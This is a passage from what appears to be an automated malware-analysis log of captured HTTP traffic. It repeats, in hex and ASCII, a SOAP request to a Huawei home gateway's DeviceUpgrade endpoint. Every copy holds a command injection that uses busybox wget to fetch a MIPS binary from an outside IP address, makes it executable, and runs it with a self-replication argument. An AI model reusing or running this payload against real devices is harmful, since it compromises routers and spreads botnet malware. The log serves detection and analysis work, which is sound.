6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 